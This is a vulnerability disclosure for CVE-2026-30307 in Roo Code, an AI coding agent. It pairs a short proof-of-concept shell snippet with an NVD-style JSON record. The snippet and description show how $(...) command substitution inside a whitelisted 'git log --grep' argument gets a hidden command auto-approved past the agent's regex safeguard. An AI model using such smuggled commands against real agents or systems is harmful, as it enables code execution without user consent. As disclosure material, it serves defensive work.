CVE-2026-30307

# PoC for CVE-2026-30307 # The vulnerability occurs due to improper sanitization of command arguments in Roo Code. # The regex whitelist allows 'git log' but fails to account for shell command substitution. # Example payload exploiting the command substitution via $(...) PAYLOAD="git log --grep=\"\$(whoami)\"" # To verify RCE, one could use a command that creates a file or makes a network request. # Example: touch /tmp/poc_success RCE_PAYLOAD="git log --grep=\"\$(touch /tmp/cve_2026_30307_poc)\"" echo "Payload to inject: $RCE_PAYLOAD" # If sent to the vulnerable Roo Code instance, /tmp/cve_2026_30307_poc will be created.

{"cve": {"id": "CVE-2026-30307", "sourceIdentifier": "[email protected]", "published": "2026-03-30T20:16:21.220", "lastModified": "2026-04-06T15:57:26.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Roo Code's command auto-approval module contains a critical OS command injection vulnerability that renders its whitelist security mechanism completely ineffective. The system relies on fragile regular expressions to parse command structures; while it attempts to intercept dangerous operations, it fails to account for standard Shell command substitution Roo Code (specifically$(...)and backticks ...). An attacker can construct a command such as git log --grep=\"$(malicious_command)\", forcing Syntx to misidentify it as a safe git operation and automatically approve it. The underlying Shell prioritizes the execution of the malicious code injected within the arguments, resulting in Remote Code Execution without any user interaction."}, {"lang": "es", "value": "El módulo de autoaprobación de comandos de Roo Code contiene una vulnerabilidad crítica de inyección de comandos del sistema operativo que hace que su mecanismo de seguridad de lista blanca sea completamente ineficaz. El sistema se basa en expresiones regulares frágiles para analizar estructuras de comandos; si bien intenta interceptar operaciones peligrosas, no tiene en cuenta la sustitución de comandos estándar de Shell Roo Code (específicamente $(...) y las comillas invertidas ...). Un atacante puede construir un comando como 'git log --grep=\"$(malicious_command)\"', lo que obliga a Syntx a identificarlo erróneamente como una operación git segura y aprobarlo automáticamente. El Shell subyacente prioriza la ejecución del código malicioso inyectado dentro de los argumentos, lo que resulta en ejecución remota de código sin ninguna interacción del usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:roocode:roo_code:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.46.1", "matchCriteriaId": "137AAA59-8B06-433A-9BD3-699905030A27"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/LLM-Tool-Calling-CVEs/issues/7", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://roocode.com/", "source": "[email protected]", "tags": ["Product"]}]}}